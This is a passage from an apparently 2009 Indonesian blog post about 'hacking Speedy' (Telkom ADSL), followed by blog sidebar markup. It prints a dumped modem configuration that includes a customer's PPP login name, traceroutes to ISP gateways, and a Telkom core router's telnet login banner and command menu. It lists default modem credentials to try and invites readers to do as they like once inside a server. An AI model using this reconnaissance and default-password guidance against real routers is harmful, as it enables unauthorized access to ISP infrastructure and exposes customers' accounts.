deny<br />create pfraw rule entry ruleid 21 ifname private dir in act deny<br />create pfraw rule entry ruleid 22 ifname private act deny<br />create pfraw rule entry ruleid 23 ifname private dir in act deny<br />create pfraw rule entry ruleid 24 ifname private act deny<br />create pfraw rule entry ruleid 25 ifname private dir in act deny<br />create pfraw rule entry ruleid 26 ifname private act deny<br />create pfraw rule entry ruleid 27 ifname private dir in act deny<br />create pfraw rule entry ruleid 28 ifname private act deny<br />create pfraw rule entry ruleid 29 ifname private dir in act deny<br />create pfraw rule entry ruleid 30 ifname private act deny<br />create pfraw rule entry ruleid 31 ifname private dir in act deny<br />create pfraw rule entry ruleid 32 ifname private act deny<br />create pfraw rule entry ruleid 33 ifname private dir in act deny<br />create pfraw rule entry ruleid 34 ifname private act deny<br />create pfraw rule entry ruleid 35 ifname private dir in act callmgmt<br />create pfraw rule entry ruleid 36 ifname dmz dir in act callmgmt<br />create pfraw rule entry ruleid 37 dir in act callmgmt<br />create pfraw subrule entry ruleid 15 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864<br />create pfraw subrule entry ruleid 16 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864<br />create pfraw subrule entry ruleid 17 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF<br />create pfraw subrule entry ruleid 18 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF<br />create pfraw subrule entry ruleid 19 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035<br />create pfraw subrule entry ruleid subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035<br />create pfraw subrule entry ruleid 21 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B<br />create pfraw subrule entry ruleid 22 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B<br />create pfraw subrule entry ruleid 23 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC<br />create pfraw subrule entry ruleid 23 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0<br />create pfraw subrule entry ruleid 24 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC<br />create pfraw subrule entry ruleid 24 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0<br />create pfraw subrule entry ruleid 25 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138<br />create pfraw subrule entry ruleid 26 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138<br />create pfraw subrule entry ruleid 27 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000<br />create pfraw subrule entry ruleid 28 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000<br />create pfraw subrule entry ruleid 29 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806<br />create pfraw subrule entry ruleid 30 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806<br />create pfraw subrule entry ruleid 31 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333<br />create pfraw subrule entry ruleid 32 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333<br />create pfraw subrule entry ruleid 33 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100<br />create pfraw subrule entry ruleid 34 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100<br />create pfraw subrule entry ruleid 35 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864<br />create pfraw subrule entry ruleid 36 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864<br />create pfraw subrule entry ruleid 37 subruleid 1 mask 0xFF offset 15 enable cmpt eq 0xA7<br />create ipf rule entry ruleid 1002 dir in act accept destaddr eq 255.255.255.255 transprot eq num 17 destport eq num 67 seclevel high<br />create ipf rule entry ruleid 1010 dir in destaddr bcast seclevel high<br />create ipf rule entry ruleid 10 dir in destaddr eq 255.255.255.255 seclevel high<br />create ipf rule entry ruleid 1030 ifname private dir in act accept storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1040 ifname private dir out act accept srcaddr self storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1050 ifname private dir out act accept transprot eq num 17 destport eq num 53 inifname dmz storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1060 ifname private dir out act accept transprot eq num 6 destport eq num 53 inifname dmz storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1070 ifname private dir out act accept transprot eq num 6 destport eq num 25 inifname dmz storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1080 ifname private dir out act accept transprot eq num 6 destport eq num 110 inifname dmz storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1090 ifname private dir out act accept transprot eq num 6 destport eq num 21 inifname dmz storestate enable seclevel medium low<br />create ipf rule entry ruleid 1100 ifname private dir out act accept transprot eq num 6 destport eq num 80 inifname dmz storestate enable seclevel medium low<br />create ipf rule entry ruleid 1110 ifname private dir out act accept transprot eq num 6 destport eq num 23 inifname dmz storestate enable<br />create ipf rule entry ruleid 11 ifname private dir out act accept transprot eq num 1 inifname dmz storestate enable<br />create ipf rule entry ruleid 1130 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname private seclevel high<br />create ipf rule entry ruleid 1140 ifname dmz dir out transprot eq num 17 destport eq num 53 inifname public seclevel high<br />create ipf rule entry ruleid 1150 ifname dmz dir out transprot eq num 6 destport eq num 53 inifname public seclevel high<br />create ipf rule entry ruleid 1160 ifname dmz dir out transprot eq num 6 destport eq num 21 inifname public seclevel high<br />create ipf rule entry ruleid 1170 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname public seclevel high medium low<br />create ipf rule entry ruleid 1180 ifname dmz dir out transprot eq num 1 inifname public seclevel high medium<br />create ipf rule entry ruleid 1190 ifname public dir out transprot eq num 6 destport eq num 23 seclevel high<br />create ipf rule entry ruleid 10 ifname public dir out act accept srcaddr self storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1210 ifname public dir in destaddr bcast seclevel medium<br />create ipf rule entry ruleid 12 ifname public dir in destaddr eq 255.255.255.255 seclevel medium<br />create ipf rule entry ruleid 1230 ifname public dir in transprot eq num 17 destport eq num 7 seclevel high medium<br />create ipf rule entry ruleid 1240 ifname public dir in transprot eq num 17 destport eq num 9 seclevel high medium<br />create ipf rule entry ruleid 1250 ifname public dir in transprot eq num 17 destport eq num 19 seclevel high medium<br />create ipf rule entry ruleid 1260 ifname public dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium low<br />create ipf rule entry ruleid 1270 ifname public dir in destaddr self transprot eq num 17 destport eq num 53 seclevel high<br />create ipf rule entry ruleid 1280 ifname public dir in destaddr self transprot eq num 6 destport eq num 53 seclevel high<br />create ipf rule entry ruleid 1290 ifname public dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium low<br />create ipf rule entry ruleid 1300 ifname public dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium low<br />create ipf rule entry ruleid 1310 ifname public dir in destaddr self transprot eq num 1 seclevel high medium<br />create ipf rule entry ruleid 13 ifname public dir in act accept destaddr self transprot eq num 17 destport eq num 53 storestate enable seclevel medium low<br />create ipf rule entry ruleid 1330 ifname public dir in act accept destaddr self transprot eq num 6 destport eq num 53 storestate enable seclevel medium low<br />create ipf rule entry ruleid 1340 ifname public dir in seclevel high isipopt yes<br />create ipf rule entry ruleid 1350 ifname public dir in seclevel high isfrag yes<br />create ipf rule entry ruleid 1360 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium<br />create ipf rule entry ruleid 1370 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium<br />create ipf rule entry ruleid 1380 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium<br />create ipf rule entry ruleid 1390 ifname dmz dir in act accept storestate enable seclevel high medium low<br />modify ipf global pubdefact accept pvtdefact deny dmzdefact accept<br />modify dhcp server cfg enable<br />create dhcp server pool start-ip 192.168.1.3 poolid 0 end-ip 192.168.1.34 mask 255.255.255.0<br />modify snmp trap disable<br />create rip intf ifname ppp-0<br />create ethernet intf ifname eth-0 ip 192.168.1.1 mask 255.255.255.0<br />create usb intf ifname usb-0 ip 192.168.1.2 mask 255.255.255.0<br />modify ip cfg ttl 64<br />modify dsl config adsl2plusauto annex adsl2plus framing-3et maxbits 15 rxstart 6 rxend 511 duallatency disable ecfdmmode ec maxdnrate 0×1ff autosraenable disable advcapability annexa adsl2 adsl2plus t1413<br />create atm port enable ifname atm-0 maxvc 8 oamsrc 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF<br />create ppp security ifname default<br />create ppp security ifname ppp-0 login 1527050063@telkom.net passwd (saya Hidden) he he he kasihan nanti<br />create atm trfdesc trfindex 0<br />create atm vc intf ifname aal5-0 lowif atm-0 vpi 0 vci 35 a5maxproto 2<br />create ppp intf ifname ppp-0 mru 1492 lowif aal5-0 droute true ppoe outside usedns true<br />modify nat global enable<br />create nat rule entry ruleid 1 napt<br />create alg port portno 21 prot num 6 algtype ftp<br />create alg port portno 1701 prot num 17 algtype l2tp<br />create alg port portno 1723 prot num 6 algtype pptp<br />create alg port portno 554 prot num 6 algtype rtsp<br />create alg port portno 7070 prot num 6 algtype ra<br />create alg port portno 7648 prot num 6 algtype cuseeme<br />create alg port portno 1719 prot num 17 algtype h323_ras<br />create alg port portno 17 prot num 6 algtype h323_q931<br />create alg port portno 6661 prot num 6 algtype mirc<br />create alg port portno 6662 prot num 6 algtype mirc<br />create alg port portno 6663 prot num 6 algtype mirc<br />create alg port portno 6664 prot num 6 algtype mirc<br />create alg port portno 6665 prot num 6 algtype mirc<br />create alg port portno 6666 prot num 6 algtype mirc<br />create alg port portno 6667 prot num 6 algtype mirc<br />create alg port portno 6668 prot num 6 algtype mirc<br />create alg port portno 6669 prot num 6 algtype mirc<br />create alg port portno 161 prot num 17 algtype snmp<br />create alg port portno 407 prot num 17 algtype timbuktu<br />create alg port portno 6301 prot num 17 algtype sgicompcore<br />create alg port portno 1863 prot num 6 upnpaware true algtype msnmsgr<br />create alg port portno 389 prot num 6 algtype ldap<br />create alg port portno 1002 prot num 6 algtype ldap<br />create alg port portno 500 prot num 17 algtype ike<br />create alg port portno 0 prot num 50 algtype esp<br />create alg port portno 1503 prot num 6 upnpaware true algtype t1<br />create alg port portno 5060 upnpaware true algtype sip<br />create alg port portno 5190 prot num 6 algtype icq<br />create bridge port intf ifname eth-0<br />modify stp port info ifname eth-0 priority 0×80 pcost 100<br />create dhcp relay intf ifname ppp-0<br />create igmp intf ifname ppp-0 host<br />modify autodetect cfg prot ppoe eoa<br />modify upnp cfg nbstatus enable<br />modify ilmi access protocol ifname atm-0 vpi 0 vci 35 proto any<br />trigger ilmi<br />END<br />Dah Di atas tersebut hasil dump saya tidak bisa menunjukan bagaimana cara dump tsb karena saya takut kawan kawan yang mempunyai etika jelek merusak atau menyalah gunakan dari artikel ini..<br />oke sekarang kan logikanya satu line satu user jadi enngak mungkin kita masuk ke user mereka sekarang kita cobak tembus ke main routernya atau server utama Gateway mereka.<br />C:\>tracert www.malanghack.net<br />Tracing route to malanghack.net [2.67.10.157]<br />over a maximum of 30 hops:<br />1 <1 ms <1 ms <1 ms 192.168.1.1<br />2 69 ms 66 ms 65 ms 1.subnet125-164-96.speedy.telkom.net.id [125.164.96.1]<br />3 69 ms 64 ms 66 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]<br />4 83 ms 96 ms 87 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8<br />.]<br />5 81 ms 79 ms 79 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67<br />.10.157]<br />Trace complete.<br />C:\><br />Anda bisa lihat saya mencoba meminjam modem dan mencoba di rumah saya hasil nya kita dapat konek dengan access speedy unlimite he he he he<br />125.164.96.1 << ini gateway nya tapi ini kek nya GW untuk personal alias Rumahan<br />oke bentar saya tanyak ama kawan yang pakai speedy di warnetnya.<br />Hadi: gus<br />Hadi: ketik nang dos koyok wingi<br />juss_orange: hadir<br />juss_orange: woce<br />Hadi: tracert www.malanghack.net<br />Hadi: paste mrene<br />Hadi: endi cok<br />juss_orange: Tracing route to malanghack.net [2.67.10.157]<br />over a maximum of 30 hops:<br />1 <1 ms <1 ms <1 ms 192.168.0.1<br />2 <1 ms <1 ms <1 ms 192.168.1.1<br />3 53 ms 52 ms 53 ms 1.subnet125-164-127.speedy.telkom.net.id [125.164.127.1]<br />4 55 ms 52 ms 53 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]<br />5 521 ms 425 ms 82 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8.]<br />6 489 ms 838 ms 607 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67.10.157]<br />Hadi: oke thanks<br />Itu hasil di warnet jadi GW warnet 125.164.127.1 << ini he he he<br />sekarang kita cobak masuk ke router telkom pusat Gatewaynya<br />******************************************************* **<br />* All rights reserved (1997-04) &n bsp; *<br />* Without the owner’s prior written consent, *<br />*no decompiling or reverse-engineering shall be allowed.*<br />******************************************************* **<br />Login authentication<br />Password:<br />Note: The max number of VTY users is 5, and the current number<br />of VTY users on line is 1.<br /><BRASS-MLK><br />hehehe ITu main router dari 125.164.96.1 Gw personal sekarang kita cobak dari GW warnet apa sama ?<br />******************************************************* **<br />* All rights reserved (1997-04) &n bsp; *<br />* Without the owner’s prior written consent, *<br />*no decompiling or reverse-engineering shall be allowed.*<br />******************************************************* **<br />Login authentication<br />Password:<br />Note: The max number of VTY users is 5, and the current number<br />of VTY users on line is 1.<br /><BRASS-MLK><br />Ha ha ha ha rupanya sapa personal ama warnet<br /><BRASS-MLK>?<br />User view commands:<br />bootload Set bootload information<br />cd &n bsp; Change current directory<br />clock Specify the system clock<br />compare Compare function<br />copy Copy from one file to another<br />debugging Enable system debugging functions<br />delete Delete a file<br />dir List files on a file system<br />display Display current system information<br />downsfu Down SFU’s DASL port<br />fixdisk Recover lost chains in storage device<br />format Format the device<br />free Clear user terminal interface<br />ftp Open FTP connection<br />language-mode Specify the language environment<br />lock Lock current user terminal interface<br />mkdir Create a new directory<br />more Display the contents of a file<br />move Move the file<br />msdp-tracert MSDP traceroute to source RP<br />mtracert Traceroute to multicast source<br />net Set net switch mode<br />patch Patch subcommands<br />ping Ping function<br />pwd Display current working directory<br />quit Exit from current command view<br />reboot Reboot whole router.<br />refresh Refresh routes<br />rename Rename a file or directory<br />reset Reset operation<br />rmdir Remove an existing directory<br />save Save current configuration<br />schedule schedule system task<br />send Send information to other user terminal interface<br />slave Specify HA command<br />startup Config paramater for system to startup<br />super Privilege current user a specified priority level<br />switch Switch communication channel<br />system-view Enter the system view<br />telnet Establish one TELNET connection<br />terminal Set the terminal line characteristics<br />tftp Open TFTP connection<br />tracert Trace route function<br />undelete Recover a deleted file<br />undo Cancel current setting<br />unzip Decompress a file<br />upgrade Online upgrade software<br />xmodem Receive a file by Xmodem protocol<br />zip Compress a file<br /><BRASS-MLK><br />itu command dari xmodem mereka …..<br />Oke sekarang kita analisa dari di atas.<br />Prolink modem biasanya password default mereka login : admin pass: password atau ada merk soho Login : admin : adslroot dll<br />silakan tergantung kreatifitas anda he he he.<br />Kalau kita dah masuk server itu tergantung kita mau apakan itu hehehe<br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/hacking-speedy.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <!--Can't find substitution for tag [adEnd]--> </div> <div class='blog-pager' id='blog-pager'> <span id='blog-pager-newer-link'> <a class='blog-pager-newer-link' href='http://trycahgo.blogspot.com/search?updated-max=2010-01-29T07:25:00-08:00&max-results=5&reverse-paginate=true' id='Blog1_blog-pager-newer-link' title='Postingan Lebih Baru'>Postingan Lebih Baru</a> </span> <p align='left'><b>Artikel Lainnya Cari Dibawah Ini : </b></p> <style type='text/css'> @import url(http://www.google.com/cse/api/branding.css); </style> <div class='cse-branding-right' style='background-color:#999999;color:#000000'> <div class='cse-branding-form'> <form action='http://www.google.co.id/cse' id='cse-search-box'> <div> <input name='cx' type='hidden' value='partner-pub-3442224118567282:5zmuzz23mub'/> <input name='ie' type='hidden' value='ISO-8859-1'/> <input name='q' size='31' type='text'/> <input name='sa' type='submit' value='Cari Artikel'/> </div> </form> </div> <div class='cse-branding-logo'> <img alt='Google' src='http://www.google.com/images/poweredby_transparent/poweredby_999999.gif'/> </div> <div class='cse-branding-text'> </div> </div> <span id='blog-pager-older-link'> <a class='blog-pager-older-link' href='http://trycahgo.blogspot.com/search?updated-max=2009-08-08T08:01:00-07:00&max-results=5' id='Blog1_blog-pager-older-link' title='Postingan Lama'>Postingan Lama</a> </span> <a class='home-link' href='http://trycahgo.blogspot.com/'>Beranda</a> </div> <div class='clear'></div> </div></div> <div id='content-bgbtm'></div> </div> <div id='sidebar-wrapper'> <div id='sidebar1-bgtop'></div> <div class='sidebar section' id='sidebar'><div class='widget HTML' data-version='1' id='HTML11'> <h2 class='title'>Pencarian</h2> <div class='widget-content'> <style type="text/css"> @import url(http://www.google.com/cse/api/branding.css); </style> <div class="cse-branding-right" style="background-color:#999999;color:#000000"> <div class="cse-branding-form"> <form action="http://www.google.co.id/cse" id="cse-search-box"> <div> <input type="hidden" name="cx" value="partner-pub-3442224118567282:5zmuzz23mub" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" size="23" /> <input type="submit" name="sa" value="Cari" /> </div> </form> </div> <div class="cse-branding-logo"> <img src="http://www.google.com/images/poweredby_transparent/poweredby_999999.gif" alt="Google" /> </div> <div class="cse-branding-text"> </div> </div> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML9'> <div class='widget-content'> <!-- Histats.com START --> <a href="http://www.histats.com" target="_blank" title="blog counter"> <script language="javascript" type="text/javascript"> var s_sid = 969225;var st_dominio = 4; var cimg = 332;var cwi =112;var che =62; </script></a><script language="javascript" src="http://s10.histats.com/js9.js" type="text/javascript"></script> <noscript><a href="http://www.histats.com" target="_blank"> <img border="0" alt="blog counter" src="http://s4.histats.com/stats/0.gif?969225&1"/></a> </noscript> <!-- Histats.com END --> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML7'> <h2 class='title'>Link</h2> <div class='widget-content'> <a target="_blank" href="http://rapidlibrary.com">Best Rapidshare Search</a> <a href="http://latihan-blog.blogspot.com" target="_blank"><img border="0" alt="latihan-blog.blogspot.com" src="http://i152.photobucket.com/albums/s170/metroyanti/Blog%20templates/latblog4.gif"/></a> <p><a href="http://www.ilmugrafis.com" target="_blank"><img alt="tutorial ilmu grafis indonesia" border="0" vspace="2" title="tutorial desain grafis indonesia" height="60" src="http://www.ilmugrafis.com/images/ilmugrafis.gif" hspace="2" width="120"/></a><br/> <a href="http://www.ilmugrafis.com">ilmugrafis indonesia</a><p></p> <a href="http://www.sulit.com.ph/" target="_blank" title="Buy and Sell Philippines : Sulit.com.ph"><img border="0" width="120" alt="Buy and Sell Philippines : Sulit.com.ph" src="http://st.sulit.com.ph/images/banner1.gif" height="60" title="Buy and Sell Philippines : Sulit.com.ph"/></a> <center><a href="http://blogger-bumen.blogspot.com" target="_blank" title="Komunitas Blogger Kebumen"><img border="0" alt="komunitas blogger kebumen" src="http://i487.photobucket.com/albums/rr238/bibitku/th_BloggerKebumen1.jpg"/></a><br/><small><a href="http://www.bi2t.com" target="_blank">We Love Our City</a></small></center> <center> <a href="http://www.ilmuwebsite.com" target="_blank"> <img border="0" src="http://unair.info/img/iweb.jpg"/></a><br/> <a href="http://www.ilmuwebsite.com" target="_blank"> ilmuwebsite.com</a></center> <a href="http://www.clixsense.com/?2753829"><img style="border: solid 1px;" src="http://www.clixsense.com/static/img/clixsense2.gif"/></a></p> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML6'> <h2 class='title'>Perlengkapan</h2> <div class='widget-content'> <script src="http://widgets.amung.us/classic.js" type="text/javascript"></script><script type="text/javascript">WAU_classic('dc6512n3gst5')</script> <a href="ymsgr:sendIM?try_cahgo"> <img src="http://opi.yahoo.com/online?u=try_cahgo&m=g&t=2&l=us"/> </a> <a href="http://www.linktiger.com/" title="Broken links checking service - LinkTiger.com"> <img border="0" src="http://www.linktiger.com/images/linktiger.png" alt="Find broken links on your website for free with LinkTiger.com"/></a> <a href="http://www.growurl.com/index.php?ref=23677" target="_blank"><img border="0" width="120" alt="GrowUrl.com - growing your website" src="http://www.growurl.com/images/growurl_button.gif" height="40"/></a> <a href="http://pinoy-blogs.com/"> <img border="0" alt="Pinoy-Blogs.com" src="http://pinoy-blogs.com/gombie.img"/> </a> <script src="http://widgets.technorati.com/t.js" type="text/javascript"> </script> <a style="color:#4261DF" href="http://technorati.com/blogs/{URL}?sub=tr_authority_t_ns" class="tr_authority_t_js">View blog authority</a> <a href="http://blog-masbudi.blogspot.com/" target="_blank"><img border="0" alt="Blog Mas Budi" src="http://s474.photobucket.com/albums/rr101/setyobr_46/setyo-budi.gif" img/></a> <a href new http://blog-masbudi.blogspot.com/="target="> <a href="http://www.trikblog.co.cc" target="_blank"><img border="0" alt="tips dn trk blogger" src="http://i322.photobucket.com/albums/nn428/togu25_bucket/banner1.png"/></a></a href> <!-- Google PageRank Checker www.gealgeol.com start from here --> <div style="line-height: 100%;"> <center> <a href="http://www.gealgeol.com/php/pr" title="Google PageRank Info"><img border="0" alt="Google PageRank Info" src="http://www.gealgeol.com/php/pr.img/wireless.png"/></a> <br/><a style="color: #993333; font: bold 10px verdana; text-decoration: none;" href="http://www.gealgeol.com">www.GealGeol.com</a> </center> </div> <!-- End of Google PageRank Checker www.gealgeol.com --> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML5'> <h2 class='title'>Mau Belanja ....</h2> <div class='widget-content'> <iframe scrolling="no" style="width:120px;height:240px;" frameborder="0" src="http://rcm.amazon.com/e/cm?t=60mbsblog-20&o=1&p=8&l=as1&asins=B001QFZFS0&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=0000FF&bc1=000000&bg1=FFFFFF&f=ifr" marginheight="0" marginwidth="0"></iframe> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML2'> <div class='widget-content'> <!-- Begin: http://adsensecamp.com/ --> <script src="http://adsensecamp.com/show/?id=paM0lKQ6nFE%3D&cid=7XbjAIDKIxw%3D&chan=99ZFlpTf1nE%3D&type=4&title=3D81EE&text=000000&background=FFFFFF&border=000000&url=2BA94F" type="text/javascript"> </script> <!-- End: http://adsensecamp.com/ --> </div> <div class='clear'></div> </div></div> <div id='sidebar1-bgbtm'></div> </div> <!-- spacer for skins that want sidebar and main to be the same height--> <div class='clear'> </div> </div> <!-- end content-wrapper --> <div id='footer'> <p class='copyright'>2009 <a href='http://trycahgo.blogspot.com/'>try's blog</a> All Rights Reserved. <a href='http://www.deluxetemplates.net/'>Blogger Templates</a> created by <a href='http://www.deluxetemplates.net/'>Deluxe Templates</a> .</p> <p class='link'>CSS by <a href='http://www.freecsstemplates.org/'>Free CSS Templates</a></p> </div> </div></div> <!-- end outer-wrapper --> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/1807328581-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY7bUqe3HozsV-liQMYYT9VWw9zSqw:1714130441720';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d3621831370437288404','//trycahgo.blogspot.com/2009/','3621831370437288404'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '3621831370437288404', 'title': 'try\x27s blog', 'url': 'http://trycahgo.blogspot.com/2009/', 'canonicalUrl': 'http://trycahgo.blogspot.com/2009/', 'homepageUrl': 'http://trycahgo.blogspot.com/', 'searchUrl': 'http://trycahgo.blogspot.com/search', 'canonicalHomepageUrl': 'http://trycahgo.blogspot.com/', 'blogspotFaviconUrl': 'http://trycahgo.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'id', 'localeUnderscoreDelimited': 'id', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22try\x26#39;s blog - Atom\x22 href\x3d\x22http://trycahgo.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22try\x26#39;s blog - RSS\x22 href\x3d\x22http://trycahgo.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22try\x26#39;s blog - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/3621831370437288404/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseClientId': 'ca-pub-3442224118567282', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/16e657cb9c57b8a2', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Dapatkan link', 'key': 'link', 'shareMessage': 'Dapatkan link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Bagikan ke Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Bagikan ke Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Bagikan ke Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27id\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Baca selengkapnya', 'pageType': 'archive', 'pageName': '2009', 'pageTitle': 'try\x27s blog: 2009'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Tautan disalin ke papan klip!', 'ok': 'Oke', 'postLink': 'Tautan Pos'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Khusus', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'try\x27s blog', 'description': '', 'url': 'http://trycahgo.blogspot.com/2009/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': true, 'isLabelSearch': false, 'archive': {'year': 2009, 'rangeMessage': 'Menampilkan postingan dari 2009'}}}]); _WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'sidebar2', document.getElementById('Profile1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label1', 'sidebar2', document.getElementById('Label1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar2', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Memuat\x26hellip;'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML8', 'sidebar2', document.getElementById('HTML8'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'sidebar2', document.getElementById('HTML1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML4', 'sidebar2', document.getElementById('HTML4'), 